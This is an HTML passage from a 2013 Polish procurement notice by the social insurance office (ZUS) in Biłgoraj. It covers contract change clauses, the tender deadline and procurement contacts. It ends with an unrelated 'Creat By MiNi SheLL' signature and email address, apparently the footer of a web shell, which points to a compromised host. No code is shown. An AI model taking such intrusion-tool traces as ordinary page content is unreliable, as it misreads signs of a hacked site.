d) konieczność wykonania zamówień dodatkowych  i zmiany z tym związane
W przypadku dokonania zmiany umowy w zakresie zmiany materiałów na które wymagane było posiadanie określonych prawem atestów, świadectw, certyfikatów lub innych podobnych zaświadczeń, takie atesty, świadectwa, certyfikaty lub zaświadczenia będą zawsze wymagane wobec materiałów, zastępujących te proponowane w ofercie. 
4) Zmiany organizacji spełnienia świadczenia  
a) Zmiana treści dokumentów przedstawianych wzajemnie przez strony w trakcie realizacji umowy lub sposobu informowania o realizacji umowy. Zmiana ta nie może spowodować braku informacji niezbędnych zamawiającemu do prawidłowej oceny realizacji umowy 
5) Zmiany terminu wykonania umowy: 
Okolicznościami  stanowiącymi  podstawę zmiany umowy w tym terminu wykonania umowy mogą być w szczególności:
a) niemożliwe wcześniej do przewidzenia braki w dokumentacji (przedmiarze robót) za co nie można przypisać winy Wykonawcy;
b) przerwanie prac przez właściwe organy administracji rządowej lub samorządowej albo jako wykonanie prawomocnego orzeczeniem sądu, za co nie można przypisać winy Wykonawcy;
c) konieczność wykonania części robót inną technologią niż założono w (dokumentacji) albo konieczność wykonania zamówień dodatkowych.
d) wystąpienie jednokrotnie lub wielokrotnie siły wyższej np. klęski żywiołowej uniemożliwiającej wykonanie w terminie przedmiotu umowy zgodnie ze SIWZ. Wówczas termin wykonania przedmiotu zamówienia można przesunąć o czas niezbędny do należytego jego wykonania, nie dłużej jednak niż o okres trwania tych okoliczności. Niedotrzymanie terminu nie powoduje jakiejkolwiek odpowiedzialności za szkodę poniesioną przez drugą stronę.
e) wydłużenie przez wykonawcę okresu gwarancji, o dowolny okres.
6. W przypadkach określonych w ust.5 pkt 5) lit. c) i d) Wykonawca winien zgłosić Zamawiającemu wystąpienie tych okoliczności w ciągu 3 dni od dnia ich zaistnienia pod rygorem niemożliwości ich późniejszego podniesienia.  
7. Zmiany o których mowa w ust.5 umowy wymagają formy pisemnej i  nie stanowią podstawy do żądania przez Wykonawcę wzrostu wynagrodzenia.  
8. Zamawiający może wyrazić zgodę na zmianę terminu wykonania oraz zmianę przedmiotu umowy, w przypadku wystąpienia okoliczności uniemożliwiających dotrzymanie przez Wykonawcę terminów wskazanych w umowie jeżeli te nie wynikają z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Ubezpieczeń Społecznych Oddział w Biłgoraju
Wieloosobowe Stanowisko Zamówien Publicznych
ul. Kościuszki 103, 23 -400 Biłgoraj
tel. (84) 688 12 02.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2013 godzina 11:00, miejsce: Zakład  Ubezpieczeń  Społecznych Oddział w Biłgoraju,
ul. Kościuszki  103, 23-400 Biłgoraj
sala obsługi klienta w okienku INFORMACJA OGÓLNA - dziennik podawczy..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Osoby uprawnione do porozumiewania się z wykonawcami: 1)W sprawach dotyczących przedmiotu zamówienia: a)Henryka Jednorowicz - Starszy Specjalista Wydziału Administracji i Remontów tel. (82) 56 53455 w. 231, (84) 688 12 02, b)Ryszard Żabiński - Starszy Inspektor Wydziału Administracji i Remontów, tel. (84) 688 12 02, 2)W sprawach proceduralnych: a)Dariusz Cios - Specjalista Wieloosobowego Stanowiska Zamówień Publicznych tel. (84) 688 12 02 b)Monika Bednarz - Inspektor Wieloosobowego Stanowiska Zamówień Publicznych tel. (84) 688 12 02, Biłgoraj, ul. Kościuszki 103. 2.Osoby uprawnione przez Zamawiającego do porozumiewania się z Wykonawcami udzielają informacji w godz. 8:00 do 14:00 w dni robocze z wyjątkiem sobót i dni ustawowo wolnych od pracy. 3.Numer postępowania nadany sprawie przez Zamawiającego 030000/370/20/2013-ZAP..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com